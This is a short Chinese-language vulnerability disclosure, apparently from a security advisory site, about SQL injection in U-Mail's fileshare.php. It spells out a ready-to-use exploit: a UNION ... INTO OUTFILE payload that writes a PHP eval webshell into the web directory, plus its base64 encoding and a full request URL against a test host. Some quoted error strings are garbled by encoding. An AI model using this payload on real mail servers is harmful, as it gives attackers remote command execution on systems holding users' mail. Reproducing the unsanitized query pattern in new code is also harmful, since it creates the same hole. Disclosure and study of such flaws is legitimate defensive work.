### 简要描述:
### 详细说明:
u-mail注入导致任意代码执行漏洞
U mail 邮件系统涉及金融、政府、银行,石油、军队、证券、设置是国家外交部重要部门等。所以漏洞危害可想而知。
具体漏洞细节如下
在fileshare.php中
mysql_query( "SET NAMES 'UTF8'");
mysql_select_db( $database );
$file_id = $_GET['file'];
$inmail = $_GET['inmail'];
if ( !$file_id )
{
exitout("鍙傛暟閿欒锛? );
}
$file_id = rawurldecode( base64_decode($file_id ) );
$sql = "SELECT * FROM netfile_fileWHERE file_id='".$file_id."' AND is_share='1'";
$file = @mysql_fetch_assoc( @mysql_query($sql ) );
if ( !$file )
{
exitout("鏃犳鍏变韩鏂囦欢锛? );
}
由于file 参数未进行任何过滤,经过一次base64_decode解密,导致我们可以将单引号等危险参数传进来,由于屏蔽了回显,所以没办法直接用工具注入
但是我们通过Mysql 数据查看netfile_file表的结果,发现他有14个字段
所以我们可以直接union 直接写shell
当$file_id 经过解密时候为
aa' union select 1,2,3,4,5,6,'<?phpeval($_POST[cmd]);?>',8,9,10,11,12,13,14 into outfile'C:/umail/WorldClient/html/360.php'# 即可写shell了
我们加密下
YWEnIHVuaW9uIHNlbGVjdCAxLDIsMyw0LDUsNiw3LDgsOSwxMCwxMSwxMiwxMywxNCBpbnRvIG91dGZpbGUgJ0M6L3VtYWlsL1dvcmxkQ2xpZW50L2h0bWwvMzYwLnBocCcj
当http://192.168.56.128/webmail/fileshare.php?file=YWEnIHVuaW9uIHNlbGVjdCAxLDIsMyw0LDUsNiwnPD9waHAgZXZhbCgkX1BPU1RbY21kXSk7Pz4nLDgsOSwxMCwxMSwxMiwxMywxNCBpbnRvIG91dGZpbGUgJ0M6L3VtYWlsL1dvcmxkQ2xpZW50L2h0bWwvMzYwLnBocCcj
即可在web目录写下我们的文件360.php 文件了
[<img src="https://images.seebug.org/upload/201311/20164551010a93848b5e80e24ad14d614ca38af6.jpg" alt="`5GI@$P3{A)}[DCU4X[TTRR.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201311/20164551010a93848b5e80e24ad14d614ca38af6.jpg)
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201311/20164551010a93848b5e80e24ad14d614ca38af6.jpg" alt="`5GI@$P3{A)}[DCU4X[TTRR.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201311/20164551010a93848b5e80e24ad14d614ca38af6.jpg)
京公网安备 11010502034610号
暂无评论